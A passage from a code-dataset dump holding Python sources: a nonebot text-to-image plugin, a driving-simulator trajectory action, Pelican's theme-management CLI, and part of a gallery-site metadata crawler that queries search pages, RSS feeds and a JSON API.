* 1.5)\n self.title_line_space = font_size\n\n def set_font_color(self, text_color: tuple, title_color: Optional[tuple] = None):\n \"\"\"设置字体颜色\"\"\"\n self.text_color = text_color\n if title_color is not None:\n self.title_color = title_color\n else:\n self.title_color = text_color\n\n def set_width(self, width: int):\n \"\"\"设置图片宽度\"\"\"\n self.text_max_width = width\n self.fix_width = True\n\n def word_wrap(self, text: str, font: ImageFont.FreeTypeFont) -> str:\n \"\"\"自动换行\"\"\"\n temp_len = 0\n result = \"\"\n for ch in text:\n char_w = font.getsize(ch)[0]\n if ch == \"\\n\":\n result += ch\n temp_len = 0\n elif char_w > 0:\n result += ch\n temp_len += char_w\n if temp_len > self.text_max_width - self.text_font_size:\n temp_len = 0\n result += \"\\n\"\n result = result.rstrip()\n return result\n\n def draw_img(\n self, title: str, text: str, template: Union[str, dict] = \"mi\"\n ) -> Image.Image:\n \"\"\"绘制给定模板下的图片\"\"\"\n\n if isinstance(template, str):\n try:\n template = templates[template] # type: ignore\n except KeyError:\n template = templates[\"mi\"] # type: ignore\n\n try:\n font_family = template[\"font\"] # type: ignore\n text_color = template[\"text\"][\"color\"] # type: ignore\n title_color = template[\"title\"][\"color\"] # type: ignore\n margin = int(template[\"margin\"]) # type: ignore\n background = template[\"background\"] # type: ignore\n except KeyError:\n raise ValueError(\"Invalid template\")\n\n if not Path(font_family).exists():\n raise ValueError(\"Invalid font\")\n\n self.set_font_family(font_family)\n self.set_font_color(text_color, title_color) # type: ignore\n text_img = self.draw_text(title, text)\n\n try:\n if background[\"type\"] == \"image\": # type: ignore\n out_img = Image.new(\n \"RGBA\",\n (text_img.width + 2 * margin, text_img.height + 2 * margin),\n (0, 0, 0, 0),\n )\n bg_img = Image.open(background[\"image\"]) # type: ignore\n out_img = tile_image(bg_img, out_img)\n elif background[\"type\"] == \"color\": # type: ignore\n out_img = Image.new(\"RGBA\", (text_img.width + 2 * margin, text_img.height + 2 * margin), background[\"color\"]) # type: ignore\n else:\n raise ValueError(\"Invalid background type\")\n except Exception:\n raise ValueError(\"Invalid template\")\n\n out_img.paste(text_img, (margin, margin), text_img)\n\n 
try:\n border = template[\"border\"] # type: ignore\n border_color = border[\"color\"] # type: ignore\n border_width = int(border[\"width\"]) # type: ignore\n border_margin = int(border[\"margin\"]) # type: ignore\n draw = ImageDraw.Draw(out_img)\n draw.rectangle(\n (\n border_margin,\n border_margin,\n out_img.width - border_margin,\n out_img.height - border_margin,\n ),\n outline=border_color,\n width=border_width,\n )\n except KeyError:\n pass\n except Exception:\n raise ValueError(\"Invalid template\")\n\n return out_img\n\n def draw(self, title: str, text: str, template: Union[str, dict] = \"mi\") -> str:\n \"\"\"绘制给定模板下指定标题与正文的图片并转换为base64\"\"\"\n out_img = self.draw_img(title, text, template)\n return img2b64(out_img)\n\n def draw_text(self, title: str, text: str) -> Image.Image:\n \"\"\"绘制标题与正文的图片\"\"\"\n title_font = ImageFont.truetype(self.font_family, self.title_font_size)\n text_font = ImageFont.truetype(self.font_family, self.text_font_size)\n\n if title == \" \":\n title = \"\"\n\n if len(title.split(\"\\n\")) > 1:\n title = title.split(\"\\n\")[0]\n\n text = self.word_wrap(text, text_font)\n\n lines = text.split(\"\\n\")\n text_rows = len(lines)\n\n title_width = title_font.getsize(title)[0]\n\n if not self.fix_width:\n line_max_width = max([text_font.getsize(line)[0] for line in lines])\n text_total_width = max(line_max_width, title_width)\n else:\n text_total_width = self.text_max_width\n\n if title:\n text_total_height = (\n self.title_font_size\n + self.title_line_space\n + self.text_font_size * text_rows\n + (text_rows - 1) * (self.text_line_space)\n )\n else:\n text_total_height = self.text_font_size * text_rows + (text_rows - 1) * (\n self.text_line_space\n )\n\n out_img = Image.new(\n mode=\"RGBA\", size=(text_total_width, text_total_height), color=self.bg_color\n )\n draw = ImageDraw.Draw(out_img)\n\n if title:\n draw.text(\n ((text_total_width - title_width) // 2, 0),\n title,\n font=title_font,\n fill=self.text_color,\n spacing=self.title_line_space,\n )\n draw.text(\n (\n 0,\n self.title_font_size + self.title_line_space,\n ),\n text,\n font=text_font,\n fill=self.text_color,\n spacing=self.text_line_space,\n )\n else:\n draw.text(\n (0, 0),\n text,\n font=text_font,\n fill=self.text_color,\n spacing=self.text_line_space,\n )\n\n return out_img\n\n\ndef tile_image(small_image: Image.Image, big_image: Image.Image) -> Image.Image:\n \"\"\"将小图片平铺到大图片上\"\"\"\n w, h = small_image.size\n\n for i in range(0, big_image.size[0], w):\n for j in range(0, big_image.size[1], h):\n big_image.paste(small_image, (i, j))\n\n return big_image\n\n\ndef img2b64(img) -> str:\n \"\"\"图片转 base64\"\"\"\n buf = BytesIO()\n img.save(buf, format=\"PNG\")\n base64_str = \"base64://\" + b64encode(buf.getvalue()).decode()\n return base64_str\n","repo_name":"mobyw/nonebot-plugin-txt2img","sub_path":"nonebot_plugin_txt2img/txt2img.py","file_name":"txt2img.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"20161298115","text":"import numpy as np\nfrom driving_sim.actions.action import Action\n\nclass TrajectoryAccelAction(Action):\n def __init__(self,a_s,a_t,trajectory):\n self.a_s = a_s\n self.a_t = a_t # is always 0 for now!\n self.trajectory = trajectory\n\n def update(self,car,dt):\n s, t, theta, curv = self.trajectory.xy_to_traj(car.position)\n\n v_x, v_y = car.velocity[0], car.velocity[1]\n # rotate the total velocity for theta degrees\n v_s = v_x*np.cos(theta) + v_y*np.sin(theta)\n 
v_t = -v_x*np.sin(theta) + v_y*np.cos(theta)\n phi = np.arctan2(v_t, v_s)\n\n v_s_new = v_s + self.a_s*dt\n v_t_new = v_t + self.a_t*dt\n velocity_new = car.set_velocity(np.array([v_s_new, v_t_new]))\n v_s_new, v_t_new = velocity_new[0], velocity_new[1]\n s_new = s + 0.5*(v_s+v_s_new)*dt\n t_new = t + 0.5*(v_t+v_t_new)*dt\n\n x_new, y_new, theta_new, curv_new = self.trajectory.traj_to_xy(np.array([s_new, t_new]))\n # rotate the velocity back\n v_x_new = v_s_new*np.cos(theta_new) - v_t_new*np.sin(theta_new)\n v_y_new = v_s_new*np.sin(theta_new) + v_t_new*np.cos(theta_new)\n\n car.set_position(np.array([x_new,y_new]))\n # print('velocity:', v_x_new, v_y_new)\n car.set_velocity(np.array([v_x_new, v_y_new]))\n phi_new = np.arctan2(v_t_new, v_s_new)\n\n max_ang = car._max_rotation #np.pi/18.\n if phi_new > max_ang:\n car.set_rotation(theta_new+max_ang)\n elif phi_new < -max_ang:\n car.set_rotation(theta_new-max_ang)\n else:\n car.set_rotation(theta_new+phi_new)\n","repo_name":"Shuijing725/VAE_trait_inference","sub_path":"driving_sim/actions/trajectory_accel_action.py","file_name":"trajectory_accel_action.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"36456538020","text":"#!/usr/bin/env python\n\nimport argparse\nimport os\nimport shutil\nimport sys\n\n\ndef err(msg, die=None):\n \"\"\"Print an error message and exits if an exit code is given\"\"\"\n sys.stderr.write(msg + \"\\n\")\n if die:\n sys.exit(die if isinstance(die, int) else 1)\n\n\ntry:\n import pelican\nexcept ImportError:\n err(\n \"Cannot import pelican.\\nYou must \"\n \"install Pelican in order to run this script.\",\n -1,\n )\n\n\nglobal _THEMES_PATH\n_THEMES_PATH = os.path.join(\n os.path.dirname(os.path.abspath(pelican.__file__)), \"themes\"\n)\n\n__version__ = \"0.2\"\n_BUILTIN_THEMES = [\"simple\", \"notmyidea\"]\n\n\ndef main():\n \"\"\"Main function\"\"\"\n\n parser = argparse.ArgumentParser(description=\"\"\"Install themes for Pelican\"\"\")\n\n excl = parser.add_mutually_exclusive_group()\n excl.add_argument(\n \"-l\",\n \"--list\",\n dest=\"action\",\n action=\"store_const\",\n const=\"list\",\n help=\"Show the themes already installed and exit\",\n )\n excl.add_argument(\n \"-p\",\n \"--path\",\n dest=\"action\",\n action=\"store_const\",\n const=\"path\",\n help=\"Show the themes path and exit\",\n )\n excl.add_argument(\n \"-V\",\n \"--version\",\n action=\"version\",\n version=f\"pelican-themes v{__version__}\",\n help=\"Print the version of this script\",\n )\n\n parser.add_argument(\n \"-i\",\n \"--install\",\n dest=\"to_install\",\n nargs=\"+\",\n metavar=\"theme path\",\n help=\"The themes to install\",\n )\n parser.add_argument(\n \"-r\",\n \"--remove\",\n dest=\"to_remove\",\n nargs=\"+\",\n metavar=\"theme name\",\n help=\"The themes to remove\",\n )\n parser.add_argument(\n \"-U\",\n \"--upgrade\",\n dest=\"to_upgrade\",\n nargs=\"+\",\n metavar=\"theme path\",\n help=\"The themes to upgrade\",\n )\n parser.add_argument(\n \"-s\",\n \"--symlink\",\n dest=\"to_symlink\",\n nargs=\"+\",\n metavar=\"theme path\",\n help=\"Same as `--install', but create a symbolic link instead of \"\n \"copying the theme. 
Useful for theme development\",\n )\n parser.add_argument(\n \"-c\",\n \"--clean\",\n dest=\"clean\",\n action=\"store_true\",\n help=\"Remove the broken symbolic links of the theme path\",\n )\n\n parser.add_argument(\n \"-v\", \"--verbose\", dest=\"verbose\", action=\"store_true\", help=\"Verbose output\"\n )\n\n args = parser.parse_args()\n\n to_install = args.to_install or args.to_upgrade\n to_sym = args.to_symlink or args.clean\n\n if args.action:\n if args.action == \"list\":\n list_themes(args.verbose)\n elif args.action == \"path\":\n print(_THEMES_PATH)\n elif to_install or args.to_remove or to_sym:\n if args.to_remove:\n if args.verbose:\n print(\"Removing themes...\")\n\n for i in args.to_remove:\n remove(i, v=args.verbose)\n\n if args.to_install:\n if args.verbose:\n print(\"Installing themes...\")\n\n for i in args.to_install:\n install(i, v=args.verbose)\n\n if args.to_upgrade:\n if args.verbose:\n print(\"Upgrading themes...\")\n\n for i in args.to_upgrade:\n install(i, v=args.verbose, u=True)\n\n if args.to_symlink:\n if args.verbose:\n print(\"Linking themes...\")\n\n for i in args.to_symlink:\n symlink(i, v=args.verbose)\n\n if args.clean:\n if args.verbose:\n print(\"Cleaning the themes directory...\")\n\n clean(v=args.verbose)\n else:\n print(\"No argument given... exiting.\")\n\n\ndef themes():\n \"\"\"Returns the list of the themes\"\"\"\n for i in os.listdir(_THEMES_PATH):\n e = os.path.join(_THEMES_PATH, i)\n\n if os.path.isdir(e):\n if os.path.islink(e):\n yield (e, os.readlink(e))\n else:\n yield (e, None)\n\n\ndef list_themes(v=False):\n \"\"\"Display the list of the themes\"\"\"\n for theme_path, link_target in themes():\n if not v:\n theme_path = os.path.basename(theme_path)\n if link_target:\n if v:\n print(theme_path + (\" (symbolic link to `\" + link_target + \"')\"))\n else:\n print(theme_path + \"@\")\n else:\n print(theme_path)\n\n\ndef remove(theme_name, v=False):\n \"\"\"Removes a theme\"\"\"\n\n theme_name = theme_name.replace(\"/\", \"\")\n target = os.path.join(_THEMES_PATH, theme_name)\n\n if theme_name in _BUILTIN_THEMES:\n err(\n theme_name + \" is a builtin theme.\\n\"\n \"You cannot remove a builtin theme with this script, \"\n \"remove it by hand if you want.\"\n )\n elif os.path.islink(target):\n if v:\n print(\"Removing link `\" + target + \"'\")\n os.remove(target)\n elif os.path.isdir(target):\n if v:\n print(\"Removing directory `\" + target + \"'\")\n shutil.rmtree(target)\n elif os.path.exists(target):\n err(target + \" : not a valid theme\")\n else:\n err(target + \" : no such file or directory\")\n\n\ndef install(path, v=False, u=False):\n \"\"\"Installs a theme\"\"\"\n if not os.path.exists(path):\n err(path + \" : no such file or directory\")\n elif not os.path.isdir(path):\n err(path + \" : not a directory\")\n else:\n theme_name = os.path.basename(os.path.normpath(path))\n theme_path = os.path.join(_THEMES_PATH, theme_name)\n exists = os.path.exists(theme_path)\n if exists and not u:\n err(path + \" : already exists\")\n elif exists:\n remove(theme_name, v)\n install(path, v)\n else:\n if v:\n print(f\"Copying '{path}' to '{theme_path}' ...\")\n try:\n shutil.copytree(path, theme_path)\n\n try:\n if os.name == \"posix\":\n for root, dirs, files in os.walk(theme_path):\n for d in dirs:\n dname = os.path.join(root, d)\n os.chmod(dname, 493) # 0o755\n for f in files:\n fname = os.path.join(root, f)\n os.chmod(fname, 420) # 0o644\n except OSError as e:\n err(\n \"Cannot change permissions of files \"\n \"or directory in 
`{r}':\\n{e}\".format(r=theme_path, e=str(e)),\n die=False,\n )\n except Exception as e:\n err(\n \"Cannot copy `{p}' to `{t}':\\n{e}\".format(\n p=path, t=theme_path, e=str(e)\n )\n )\n\n\ndef symlink(path, v=False):\n \"\"\"Symbolically link a theme\"\"\"\n if not os.path.exists(path):\n err(path + \" : no such file or directory\")\n elif not os.path.isdir(path):\n err(path + \" : not a directory\")\n else:\n theme_name = os.path.basename(os.path.normpath(path))\n theme_path = os.path.join(_THEMES_PATH, theme_name)\n if os.path.exists(theme_path):\n err(path + \" : already exists\")\n else:\n if v:\n print(f\"Linking `{path}' to `{theme_path}' ...\")\n try:\n os.symlink(path, theme_path)\n except Exception as e:\n err(\n \"Cannot link `{p}' to `{t}':\\n{e}\".format(\n p=path, t=theme_path, e=str(e)\n )\n )\n\n\ndef is_broken_link(path):\n \"\"\"Returns True if the path given as is a broken symlink\"\"\"\n path = os.readlink(path)\n return not os.path.exists(path)\n\n\ndef clean(v=False):\n \"\"\"Removes the broken symbolic links\"\"\"\n c = 0\n for path in os.listdir(_THEMES_PATH):\n path = os.path.join(_THEMES_PATH, path)\n if os.path.islink(path) and is_broken_link(path):\n if v:\n print(f\"Removing {path}\")\n try:\n os.remove(path)\n except OSError:\n print(f\"Error: cannot remove {path}\")\n else:\n c += 1\n\n print(f\"\\nRemoved {c} broken links\")\n","repo_name":"getpelican/pelican","sub_path":"pelican/tools/pelican_themes.py","file_name":"pelican_themes.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","stars":11876,"dataset":"github-code","pt":"37"} +{"seq_id":"17396575299","text":"# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport re\nimport time\nimport typing\nimport urllib.parse\nfrom collections import defaultdict\nfrom collections.abc import Iterable\nfrom typing import Optional\n\nimport feedparser\nfrom bs4 import BeautifulSoup\nfrom django.db.models import QuerySet\n\nfrom core.base.parsers import BaseParser\nfrom core.base.utilities import (\n chunks, request_with_retries, construct_request_dict, request_by_provider)\nfrom core.base.types import GalleryData, DataDict\nfrom viewer.models import Gallery\nfrom .utilities import link_from_gid_token_fjord, map_external_gallery_data_to_internal, \\\n get_gid_token_from_link, root_gid_token_from_link, SearchHTMLParser\nfrom . import constants\nfrom . 
import utilities\n\nif typing.TYPE_CHECKING:\n from viewer.models import WantedGallery\n from core.base.setup import Settings\n\nlogger = logging.getLogger(__name__)\n\n\nclass Parser(BaseParser):\n name = constants.provider_name\n accepted_urls = [constants.ex_page_short, constants.ge_page_short, constants.rss_url]\n\n def __init__(self, settings: 'Settings'):\n\n super().__init__(settings)\n\n self.api_request_function = request_by_provider(\n self.name, self.own_settings.api_concurrent_limit, self.own_settings.api_wait_limit\n )\n\n # Panda only methods\n def get_galleries_from_page_links(self, page_links: Iterable[str], page_links_results: list[DataDict]) -> None:\n\n api_page_links = []\n\n for page_link in page_links:\n\n m = re.search(r'(.+)/s/(\\w+)/(\\d+)-(\\d+)', page_link)\n if not m:\n continue\n api_page_links.append(\n {'data': [m.group(3), m.group(2), m.group(4)]})\n\n api_page_links_chunks = list(chunks(api_page_links, 25))\n\n for i, group in enumerate(api_page_links_chunks):\n\n data = {\n 'method': 'gtoken',\n 'pagelist': [x['data'] for x in group]}\n\n headers = {'Content-Type': 'application/json'}\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n request_dict['headers'] = {**headers, **self.settings.requests_headers}\n request_dict['data'] = json.dumps(data)\n\n response = self.api_request_function(\n constants.ge_api_url,\n request_dict,\n post=True,\n )\n\n if not response:\n continue\n try:\n response_data = response.json()\n except (ValueError, KeyError):\n logger.error(\"Could not parse response to JSON: {}\".format(response.text))\n continue\n\n for gid_token_pair in response_data['tokenlist']:\n\n discard_approved, discard_message = self.discard_gallery_by_internal_checks(\n gallery_id=gid_token_pair['gid'],\n link=link_from_gid_token_fjord(gid_token_pair['gid'], gid_token_pair['token'], False)\n )\n\n if discard_approved:\n if not self.settings.silent_processing:\n logger.info(discard_message)\n continue\n\n page_links_results.append(\n {'data': (gid_token_pair['gid'], gid_token_pair['token']),\n 'link': link_from_gid_token_fjord(gid_token_pair['gid'], gid_token_pair['token'], False)})\n\n def get_galleries_from_main_page_link(self, url: str) -> set[str]:\n\n unique_urls = set()\n\n while True:\n\n parsed = urllib.parse.urlparse(url)\n query = urllib.parse.parse_qs(parsed.query)\n if 'page' in query:\n current_page = int(query['page'][0])\n else:\n params = {'page': ['0']}\n query.update(params)\n new_query = urllib.parse.urlencode(query, doseq=True)\n url = urllib.parse.urlunparse(\n list(parsed[0:4]) + [new_query] + list(parsed[5:]))\n current_page = 0\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n\n response = request_with_retries(\n url,\n request_dict,\n post=False,\n )\n\n if not response:\n logger.info(\"Got no response, stopping\")\n break\n\n response.encoding = 'utf-8'\n\n if 'No hits found' in response.text:\n logger.info(\"Empty page found, ending\")\n break\n else:\n logger.info(\n \"Got content on search page {}, looking for galleries and jumping \"\n \"to the next page. 
Link: {}\".format(current_page, url)\n )\n main_page_parser = SearchHTMLParser()\n main_page_parser.feed(response.text)\n logger.info(\"Number of galleries found: {}\".format(len(main_page_parser.galleries)))\n if len(main_page_parser.galleries) >= 1:\n for gallery_url in main_page_parser.galleries:\n unique_urls.add(gallery_url)\n else:\n logger.info(\"Empty page found, ending\")\n break\n if self.own_settings.stop_page_number is not None:\n if current_page >= self.own_settings.stop_page_number:\n logger.info(\n \"Got to stop page number: {}, \"\n \"ending (setting: provider.stop_page_number).\".format(self.own_settings.stop_page_number)\n )\n break\n current_page += 1\n params = {'page': [str(current_page)]}\n query.update(params)\n new_query = urllib.parse.urlencode(query, doseq=True)\n url = urllib.parse.urlunparse(\n list(parsed[0:4]) + [new_query] + list(parsed[5:]))\n time.sleep(self.own_settings.wait_timer)\n\n return unique_urls\n\n def get_galleries_from_lofi_page_link(self, url: str) -> set[str]:\n\n unique_urls = set()\n\n while True:\n parsed = urllib.parse.urlparse(url)\n query = urllib.parse.parse_qs(parsed.query)\n if 'page' in query:\n current_page = int(query['page'][0])\n else:\n params = {'page': ['0']}\n query.update(params)\n new_query = urllib.parse.urlencode(query, doseq=True)\n url = urllib.parse.urlunparse(\n list(parsed[0:4]) + [new_query] + list(parsed[5:]))\n current_page = 0\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n\n response = request_with_retries(\n url,\n request_dict,\n post=False,\n )\n\n if not response:\n logger.info(\"Got no response, stopping\")\n break\n\n response.encoding = 'utf-8'\n\n if 'No hits found' in response.text:\n logger.info(\"Empty page found, ending\")\n break\n else:\n logger.info(\n \"Got content on search page {}, looking for galleries and jumping \"\n \"to the next page. 
Link: {}\".format(current_page, url)\n )\n current_found_links = []\n soup = BeautifulSoup(response.text, 'html.parser')\n gallery_containers = soup.findAll(\"td\", class_=\"ii\")\n for gallery_container in gallery_containers:\n link_container = gallery_container.find(\"a\")\n if link_container:\n found_link = link_container.get(\"href\").replace(\"lofi/\", \"\")\n current_found_links.append(found_link)\n logger.info(\"Number of galleries found: {}\".format(len(current_found_links)))\n if len(current_found_links) >= 1:\n for gallery_url in current_found_links:\n unique_urls.add(gallery_url)\n else:\n logger.info(\"Empty page found, ending\")\n break\n if self.own_settings.stop_page_number is not None:\n if current_page >= self.own_settings.stop_page_number:\n logger.info(\n \"Got to stop page number: {}, \"\n \"ending (setting: provider.stop_page_number).\".format(self.own_settings.stop_page_number)\n )\n break\n current_page += 1\n params = {'page': [str(current_page)]}\n query.update(params)\n new_query = urllib.parse.urlencode(query, doseq=True)\n url = urllib.parse.urlunparse(\n list(parsed[0:4]) + [new_query] + list(parsed[5:]))\n time.sleep(self.own_settings.wait_timer)\n\n return unique_urls\n\n def get_values_from_gallery_link_list(self, url_list: Iterable[str], use_fjord: bool = False) -> list[GalleryData]:\n\n gid_token_chunks = list(chunks([get_gid_token_from_link(link) for link in url_list], 25))\n\n galleries_data = []\n\n if self.own_settings.cookies and use_fjord:\n api_page = constants.ex_api_url\n else:\n api_page = constants.ge_api_url\n\n for i, group in enumerate(gid_token_chunks):\n\n if not self.settings.silent_processing:\n logger.info(\n \"Calling API ({}), URL: {}. \"\n \"Gallery group: {}, galleries in group: {}, total groups: {}\".format(\n self.name,\n api_page,\n i + 1,\n len(group),\n len(gid_token_chunks)\n )\n )\n\n data = utilities.request_data_from_gid_token_iterable(group)\n\n headers = {'Content-Type': 'application/json'}\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n request_dict['headers'] = {**headers, **self.settings.requests_headers}\n request_dict['data'] = json.dumps(data)\n\n response = self.api_request_function(\n api_page,\n request_dict,\n post=True,\n )\n\n if not response:\n continue\n\n try:\n response_data = response.json()\n except (ValueError, KeyError):\n logger.error(\"Could not parse response to JSON: {}\".format(response.text))\n continue\n\n for gallery_data in response_data['gmetadata']:\n if 'error' in gallery_data:\n logger.error(\n \"Fetching gallery {}: \"\n \"failed with error: {}\".format(gallery_data['gid'], gallery_data['error'])\n )\n continue\n internal_gallery_data = map_external_gallery_data_to_internal(gallery_data)\n if use_fjord and internal_gallery_data.fjord:\n internal_gallery_data.root = constants.ex_page\n internal_gallery_data.link = link_from_gid_token_fjord(\n gallery_data['gid'], gallery_data['token'], True\n )\n else:\n internal_gallery_data.root = constants.ge_page\n internal_gallery_data.link = link_from_gid_token_fjord(\n gallery_data['gid'], gallery_data['token'], False\n )\n galleries_data.append(internal_gallery_data)\n\n return galleries_data\n\n def get_values_from_gallery_link(self, link: str) -> Optional[GalleryData]:\n\n link_root, gid, token = root_gid_token_from_link(link)\n\n if link_root is None or gid is None or token is None:\n return None\n\n if self.own_settings.use_ex_for_fjord and self.own_settings.cookies and link_root == constants.ex_api_url:\n api_page 
= constants.ex_api_url\n else:\n api_page = constants.ge_api_url\n\n data = utilities.request_data_from_gid_token_iterable([(gid, token)])\n\n headers = {'Content-Type': 'application/json'}\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n request_dict['headers'] = {**headers, **self.settings.requests_headers}\n request_dict['data'] = json.dumps(data)\n\n response = self.api_request_function(\n api_page,\n request_dict,\n post=True,\n )\n\n if not response:\n return None\n try:\n response_data = response.json()\n except (ValueError, KeyError):\n logger.error(\"Could not parse response to JSON: {}\".format(response.text))\n return None\n for gallery_data in response_data['gmetadata']:\n if 'error' in gallery_data:\n logger.error(\n \"Adding gallery {}: \"\n \"failed with error: {}\".format(gallery_data['gid'], gallery_data['error'])\n )\n return None\n internal_gallery_data = map_external_gallery_data_to_internal(gallery_data)\n return internal_gallery_data\n return None\n\n def get_feed_urls(self) -> list[str]:\n return [constants.rss_url, ]\n\n def crawl_feed(self, feed_url: str = '') -> list[str]:\n\n urls: list[str] = []\n\n if not feed_url:\n feed_url = constants.rss_url\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n\n response = request_with_retries(\n feed_url,\n request_dict,\n post=False,\n )\n\n if not response:\n logger.error(\"Got no response from feed URL: {}\".format(feed_url))\n return urls\n\n response.encoding = 'utf-8'\n\n feed = feedparser.parse(\n response.text\n )\n\n for item in feed['items']:\n if self.own_settings.accepted_rss_categories:\n if any([item['title'].startswith(category) for category in self.own_settings.accepted_rss_categories]):\n urls.append(item['link'])\n else:\n urls.append(item['link'])\n return urls\n\n def fetch_gallery_data(self, url: str) -> Optional[GalleryData]:\n return self.get_values_from_gallery_link(url)\n\n def fetch_multiple_gallery_data(self, url_list: list[str]) -> list[GalleryData]:\n return self.get_values_from_gallery_link_list(url_list)\n\n @staticmethod\n def id_from_url(url: str) -> Optional[str]:\n m = re.search(r'(.+)/g/(\\d+)/(\\w+)', url)\n if m and m.group(2):\n return m.group(2)\n else:\n return None\n\n @staticmethod\n def token_from_url(url: str) -> Optional[str]:\n m = re.search(r'(.+)/g/(\\d+)/(\\w+)', url)\n if m and m.group(3):\n return m.group(3)\n else:\n return None\n\n def crawl_urls(self, urls: list[str], wanted_filters: Optional[QuerySet] = None, wanted_only: bool = False,\n preselected_wanted_matches: Optional[dict[str, list['WantedGallery']]] = None) -> None:\n\n unique_urls = set()\n gallery_data_list = []\n fetch_format_galleries: list[DataDict] = []\n unique_page_urls = set()\n gallery_wanted_lists: dict[str, list['WantedGallery']] = preselected_wanted_matches or defaultdict(list)\n\n if not self.downloaders:\n logger.warning('No downloaders enabled, returning.')\n return\n\n for url in urls:\n\n if constants.rss_url in url:\n feed_links = self.crawl_feed(url)\n unique_urls.update(feed_links)\n logger.info(\"Provided RSS URL for provider ({}), adding {} found links\".format(\n self.name,\n len(feed_links))\n )\n continue\n\n if (constants.ex_page_short not in url\n and constants.ge_page_short not in url):\n logger.warning(\"Invalid URL, skipping: {}\".format(url))\n continue\n\n if '/g/' in url:\n if not self.settings.silent_processing:\n logger.info(\"Provided URL {} is a gallery link, adding\".format(url))\n unique_urls.add(url)\n continue\n\n 
if '/s/' in url:\n if not self.settings.silent_processing:\n logger.info(\"Provided URL {} is a page link, adding\".format(url))\n unique_page_urls.add(url)\n continue\n\n # Do not crawl main page links if they were submitted anonymously, to prevent spam.\n if len(self.downloaders) == 1 and self.downloaders[0][0].type == 'submit':\n continue\n\n if '/lofi/' in url:\n if not self.settings.silent_processing:\n logger.info(\"Provided URL {} is a lofi page link, adding\".format(url))\n unique_urls.update(self.get_galleries_from_lofi_page_link(url))\n continue\n\n # assuming main page URLs\n unique_urls.update(self.get_galleries_from_main_page_link(url))\n\n gallery_ids = []\n found_galleries = set()\n total_galleries_filtered = []\n for gallery_url in unique_urls:\n\n m = re.search(r'(.+)/g/(\\d+)/(\\w+)', gallery_url)\n if m:\n gallery_ids.append(m.group(2))\n total_galleries_filtered.append((gallery_url, m.group(1), m.group(2), m.group(3)))\n\n for galleries_gid_group in list(chunks(gallery_ids, 900)):\n for found_gallery in Gallery.objects.filter(gid__in=galleries_gid_group):\n discard_approved, discard_message = self.discard_gallery_by_internal_checks(\n gallery=found_gallery,\n link=found_gallery.get_link()\n )\n\n if discard_approved:\n if not self.settings.silent_processing:\n logger.info(discard_message)\n found_galleries.add(found_gallery.gid)\n\n for gallery_tuple in total_galleries_filtered:\n\n if gallery_tuple[2] not in found_galleries:\n fetch_format_galleries.append(\n {\n 'data': (gallery_tuple[2], gallery_tuple[3]),\n 'root': gallery_tuple[1],\n 'link': gallery_tuple[0]\n }\n )\n if not self.settings.silent_processing:\n logger.info(\n \"Gallery {} will be processed. \"\n \"Total galleries: {}\".format(gallery_tuple[0], len(fetch_format_galleries))\n )\n\n if len(unique_page_urls) > 0:\n logger.info(\"Getting gallery links from page links...\")\n page_links_results: list[DataDict] = []\n self.get_galleries_from_page_links(unique_page_urls, page_links_results)\n fetch_format_galleries += page_links_results\n\n if len(fetch_format_galleries) == 0:\n logger.info(\"No galleries need downloading, returning.\")\n return\n\n fetch_format_galleries_chunks = list(chunks(fetch_format_galleries, 25))\n fjord_galleries: list[str] = []\n for i, group in enumerate(fetch_format_galleries_chunks):\n if not self.settings.silent_processing:\n logger.info(\n \"Calling non-fjord API ({}). 
\"\n \"Gallery group: {}, galleries in group: {}, total groups: {}\".format(\n self.name,\n i + 1,\n len(group),\n len(fetch_format_galleries_chunks)\n )\n )\n\n data = utilities.request_data_from_gid_token_iterable([x['data'] for x in group])\n\n headers = {'Content-Type': 'application/json'}\n\n request_dict = construct_request_dict(self.settings, self.own_settings)\n request_dict['headers'] = {**headers, **self.settings.requests_headers}\n request_dict['data'] = json.dumps(data)\n\n response = self.api_request_function(\n constants.ge_api_url,\n request_dict,\n post=True,\n )\n\n if not response:\n continue\n\n try:\n response_data = response.json()\n except (ValueError, KeyError):\n logger.error(\"Could not parse response to JSON: {}\".format(response.text))\n continue\n\n for gallery_data in response_data['gmetadata']:\n if 'error' in gallery_data:\n logger.error(\n \"Adding gallery {}: \"\n \"failed with error: {}\".format(gallery_data['gid'], gallery_data['error'])\n )\n continue\n internal_gallery_data = map_external_gallery_data_to_internal(gallery_data)\n link = link_from_gid_token_fjord(gallery_data['gid'], gallery_data['token'], False)\n internal_gallery_data.link = link\n\n banned_result, banned_reasons = self.general_utils.discard_by_gallery_data(internal_gallery_data.tags, internal_gallery_data.uploader)\n\n if banned_result:\n if not self.settings.silent_processing:\n logger.info(\n \"Skipping gallery link {}, discarded reasons: {}\".format(\n link,\n banned_reasons\n )\n )\n continue\n\n if wanted_filters:\n self.compare_gallery_with_wanted_filters(\n internal_gallery_data,\n link,\n wanted_filters,\n gallery_wanted_lists\n )\n if wanted_only and not gallery_wanted_lists[internal_gallery_data.gid]:\n continue\n\n if self.own_settings.use_ex_for_fjord:\n m = re.search(constants.default_fjord_tags, \",\".join(internal_gallery_data.tags))\n\n if m and self.own_settings.cookies:\n fjord_galleries.append(link_from_gid_token_fjord(gallery_data['gid'], gallery_data['token'], True))\n else:\n gallery_data_list.append(internal_gallery_data)\n else:\n gallery_data_list.append(internal_gallery_data)\n\n if self.own_settings.use_ex_for_fjord and fjord_galleries:\n fjord_galleries_data = self.get_values_from_gallery_link_list(fjord_galleries, True)\n\n if fjord_galleries_data:\n gallery_data_list.extend(fjord_galleries_data)\n\n self.pass_gallery_data_to_downloaders(gallery_data_list, gallery_wanted_lists)\n\n def post_gallery_processing(self, gallery_entry: 'Gallery', gallery_data: 'GalleryData'):\n\n extra_gal_data = gallery_data.extra_data\n\n galleries_to_add: dict[str, list[str]] = defaultdict(list)\n\n if self.own_settings.auto_process_newer:\n if 'current_gid' in extra_gal_data and 'current_key' in 